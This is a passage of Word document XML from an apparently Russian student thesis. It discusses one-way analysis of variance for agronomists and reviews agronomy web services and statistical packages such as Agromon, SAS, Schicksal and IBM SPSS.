      <w:r w:rsidRPr="0066369B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="790AB051" wp14:editId="2A1B0625">
            <wp:extent cx="695325" cy="28575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66369B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Порядковые номера у семёрок: 6, 7 и 8, среднее арифметическое этих рангов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A44223" w14:textId="78B10046" w:rsidR="00AC25AD" w:rsidRDefault="008F14CF" w:rsidP="004D79A4">
      <w:r>
        <w:t xml:space="preserve">Следует отметить, что однофакторный дисперсионный анализ является </w:t>
      </w:r>
      <w:r w:rsidR="004A3F2E">
        <w:t>не единственным анализом, основывающемся на оценке дисперсий у популяций, существуют еще многофакторный дисперсионный анализ, метод латинских квадратов и дисперсионный анализ с рандомизированными моделями. Но однофакторный анализ вполне может быть полезен агроному, как раз из-за своей простоты описания результатов и формата входных данных, у агронома-исследователя будет возможность делать небольшие «экспресс» анализы, для принятия решений в реактивном управлении экспериментом на поле.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39646FD9" w14:textId="77777777" w:rsidR="00AC25AD" w:rsidRDefault="00AC25AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A968B8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc122277549"/>
      <w:bookmarkStart w:id="23" w:name="_Toc161568207"/>
      <w:bookmarkStart w:id="24" w:name="_Toc162709234"/>
      <w:r w:rsidRPr="00403FE8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00403FE8">
        <w:t>Обзор существующих решений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="45235307" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00A82002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc161568208"/>
      <w:bookmarkStart w:id="26" w:name="_Toc162709235"/>
      <w:r w:rsidRPr="0045581F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0045581F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Агрономические веб-сервисы для работы с агроэкосистемой</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="77351ADE" w14:textId="0A8B10B5" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DC61AA">
      <w:r>
        <w:t>В сельском хозяйстве важным</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> аспект</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явля</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>ю</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">тся </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>проактивное</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и реактивное управление на поле. Чтобы создать эффективный цикл выращивания сельскохозяйственных культур</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> необходимо проводить осмотры посевов, анализировать севообороты и планировать распределение удобрений на поле. Существует множество цифровых решений, которые помогают агроному выполнять вышеописанные задачи. Одним из таких веб-сервисов является компьютерная программа «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Агромон</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54A2FF" w14:textId="31C361A6" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00E364BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74725D5B" wp14:editId="280DBAC8">
            <wp:extent cx="4524375" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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524375" cy="2809875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FDDD4B" w14:textId="4A22EE8B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E364BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Пользовательский интерфейс программы «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Агромон</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F32C2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E364BF">
      <w:r>
        <w:t xml:space="preserve">Данная программа позволяет планировать сезон, опираясь на информацию со спутниковых снимков полей, мониторить состояние посевов, составлять отчёты с фотографиями через мобильное приложение о состоянии посевов, работать с индексом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NDVI</w:t>
      </w:r>
      <w:r w:rsidRPr="00E364BF">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>нормализованный вегетационный индекс</w:t>
      </w:r>
      <w:r w:rsidRPr="00E364BF">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы определить проблемные участки на полях, следить за погодой и состоянием почвы, проводить аналитику собранных данных с помощью описательных статистик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAEBE8" w14:textId="43E77FB8" w:rsidR="0093378B" w:rsidRPr="00E364BF" w:rsidRDefault="0093378B" w:rsidP="00E364BF">
      <w:r>
        <w:t xml:space="preserve">Подобных программ существует достаточно много, и все они практически не отличаются друг от друга. Такие веб-сервисы создаются для </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>корпоративного использования и внедрение в фирмы. Поэтому «картами урожая» обычно пользуются агрохолдинги и фермеры, выращивающие сельхоз</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">культуры в промышленных масштабах. Внедрение программы происходит после связи с консультантом данного веб-сервиса, после чего можно выбрать тарифный план. Исходя из вышеописанной информации можно сделать вывод, что такие программы </w:t>
      </w:r>
      <w:r w:rsidR="00A43272">
        <w:t>подходят только для крупных компаний, которые могут позволить себе выделить значительный бюджет на покупку такой программы</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1868FC4C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc161568209"/>
      <w:bookmarkStart w:id="28" w:name="_Toc162709236"/>
      <w:r w:rsidRPr="0045581F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0045581F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Описание популярных статистических пакетов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0EA3C15C" w14:textId="13B51351" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:r>
        <w:t xml:space="preserve">Компьютерные программы для статистики </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4E6E">
        <w:t>разрабатывались еще в прошлом веке, в 1968 году в Чикагском университете была разработана программа SPSS, затем патент на эту программу был приобретён компанией IBM [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4E6E">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. С развитием цифровых технологий развивались и статистические пакеты, эволюционируя из простых консольных приложений с функционалом базовых описательных статистик в программы, которые можно назвать отдельным языком программирования с многочисленным количеством библиотек для всевозможных анализов и экспорта результатов в виде графиков и таблиц, как например язык программирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4E6E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и программа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="004A4E6E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DA06B" w14:textId="08359E71" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:r>
        <w:t>Программ</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>статистических пакетов разработано очень много, они различаются по своей форме – могут быть разные графические оболочки для разных операционных систем, или же графической оболочки может не быть вовсе, но в любом случае все статистические пакеты принимают на вход пользовательские данные о наблюдениях и типе анализа и в виде выходных данных выдают результаты анализа по наблюдениям. Как правило</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> статистический пакет представляет собой клиентское приложение, устанавливаемое на пользовательский компьютер, все расчеты выполняются </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">локально. Схема работы типичного статистического пакета отображено на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463FF2FA" w14:textId="4CB9C8D4" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="009A01F8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6274684A" wp14:editId="60DB00C7">
            <wp:extent cx="3695700" cy="6781800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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95700" cy="6781800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E592CF3" w14:textId="465681B4" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B109F">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>диаграмма последовательности работы статистического пакета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E2EBB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:r>
        <w:t xml:space="preserve">Безусловно, описанные выше принципы работы статистических пакетов, в их </w:t>
      </w:r>
      <w:r w:rsidRPr="004739DE">
        <w:t xml:space="preserve">разнообразии приобретают новые черты и особенности с развитием </w:t>
      </w:r>
      <w:r w:rsidRPr="004739DE">
        <w:lastRenderedPageBreak/>
        <w:t>информационных технологий и новых методов измерения. Даже несмотря на то, что почти все статистические</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> методы были выведены математиками задолго до появления первых компьютеров, с течением времени появляются новые методики проведения исследований, а также появляются новые стандарты для программных продуктов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3AE93" w14:textId="2C44AA2E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:r>
        <w:t xml:space="preserve">Важным аспектом отрасли программ для статистики является тот факт, что данные программы рассчитаны на небольшую аудиторию, вследствие этого разработчики редко обновляют, или же вообще не обновляют свое программное обеспечение, и получается так, что они выглядят не только морально устаревшими, но и вообще могут не работать на современных операционных системах. С проприетарным программным обеспечением ситуация на сегодняшний день выглядит ещё хуже – данные продукты ушли с российского рынка. Вследствие этих фактов разработка и развитие информационной системы </w:t>
      </w:r>
      <w:r w:rsidR="007B6474">
        <w:t>по статистической обработке данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выглядит крайне перспективной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C9E0D" w14:textId="36872C26" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:r>
        <w:t xml:space="preserve">Программа для статистических исследований </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SAS</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>является достаточно популярной и востребованной. SAS – пакет для статистического анализа, созданный в 1960 г. Этот пакет широко использовался исследователями в американских университетах и компаниях. Продукт является кроссплатформенным, что является очень значительным преимуществом, так как в 60ых годах не было программы для статистического анализа на Macintosh. Этот статистический пакет развивается и по сей день, в него было добавлено множество нововведений такие как: отрисовка диаграмм в реальном времени, возможность работать с потоками данных, параллельная обработка данных и т.д.</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8497D" w14:textId="77777777" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791E9688" wp14:editId="2581D50C">
            <wp:extent cx="5038725" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="Рисунок 19" descr="SAS Credit Scoring for Bank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SAS Credit Scoring for Banki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38725" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B582868" w14:textId="3929EC0B" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы SAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013227C" w14:textId="57979677" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:r>
        <w:t>Этот статистический пакет был очень распространен в российском бизнесе, но из</w:t>
      </w:r>
      <w:r w:rsidR="00240E90">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>за политических санкций этот пакет больше недоступен для скачивания и покупки в России.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA78758" w14:textId="4F3D8AAD" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:r>
        <w:t xml:space="preserve">Программа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Schicksal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE25A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предназначена для проведения статистического анализа данных, представленных в табличной форме. Программа обладает лицензи</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>ей</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GNU</w:t>
      </w:r>
      <w:r w:rsidRPr="0014691C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPL</w:t>
      </w:r>
      <w:r w:rsidRPr="0014691C">
        <w:t xml:space="preserve">-3 </w:t>
      </w:r>
      <w:r>
        <w:t>и имеет открытый исходный код. Таблицы статистических данных, с которыми работает программа, представляют собой файлы с расширением</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFFBB5" w14:textId="5916141B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>В данной программе существует возможность проведения дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D682631" w14:textId="389F6E3A" w:rsidR="0093378B" w:rsidRPr="000334BA" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:r>
        <w:t>При запуске алгоритма дисперсионного анализа на пользовательск</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>ом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> экран</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаётся таблица, которая содержит оценку того, насколько значимо влияние каждого из выбранных факторов, а также их комбинаций. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E2508" w14:textId="4F242945" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B7812A" wp14:editId="77B75426">
            <wp:extent cx="4695825" cy="4191000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38"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695825" cy="4191000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2F67DE" w14:textId="0040491B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Окно детальных результатов анализа влияния фактора (Сорт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B07FD2" w14:textId="68E03A8E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:r>
        <w:t>На примере окна, которое показано на рис</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6783">
        <w:t>ун</w:t>
      </w:r>
      <w:r>
        <w:t>ке, указан</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>зависимость</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> урожая от сорта (это указывается, наряду с условием фильтрации, в заголовке окна). В верхней части окна на графике показаны средние значения каждой из градаций факторов, с доверительными интервалами, а в нижней части окна та же самая информация представлена в виде таблицы. Контекстное меню позволяет скопировать график и вставить его в любой документ, поддерживающий вставку изображений. На второй закладке «Попарное сравнение» показаны результаты попарного сравнения каждой градации этого фактора или комбинации факторов с каждой (рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122482C5" w14:textId="15C3DA52" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78E313ED" wp14:editId="2A4AE1C4">
            <wp:extent cx="5162550" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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162550" cy="2390775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB96D20" w14:textId="0D5B2562" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Закладка с попарным сравнением градаций факторов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C28E2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="004733EF" w:rsidRDefault="0093378B" w:rsidP="000334BA">
      <w:r>
        <w:t>Для оценки статистической значимости различия каждой из пар используется критерий наименьшей существенной разницы (НСР). Метрика НСР необходима для того, чтобы попарно сравнивать градации фактора на предмет того, является ли их различие статистически значимым. Статистически значимые различия (т.е., превышающие НСР) показаны красным цветом. Кроме того, в программе присутствует меню «Справочные таблицы», в которых представлены значения статистических констант для различных уровней значимости и количествах степеней свободы. Данного функционала также нет в других статистических пакетах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD95227" w14:textId="46394DD9" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t xml:space="preserve">IBM SPSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – это ПО для эмпирических исследований, позволяющее проводить статистический анализ деловых данных на продвинутом уровне. Также эта программа может решать задачи построения бизнес</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>отчётности, планирования и сбора информации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3152F3" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t xml:space="preserve">Программа IBM SPSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> предназначена для статистического анализа данных, позволяя делать выводы по исследуемым данным. IBM SPSS имеет большую популярность среди различных компаний, центрами принятия решений и независимыми исследователями для решения специфических задач.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547F144" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t xml:space="preserve">В числе особенностей программы SPSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Statistics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> можно выделить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FFB85D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="006A4F48">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Настройка функциональности для любого пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54508886" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00DA27E9">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>SPSS позволяет предварительно обработать данные и вывести результаты в любом удобном виде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092541F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C05AA9">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Удобный пользовательский интерфейс позволяет ориентироваться в озерах данных и работать одновременно сразу с несколькими окнами.</w:t>
      </w:r>
    </w:p>
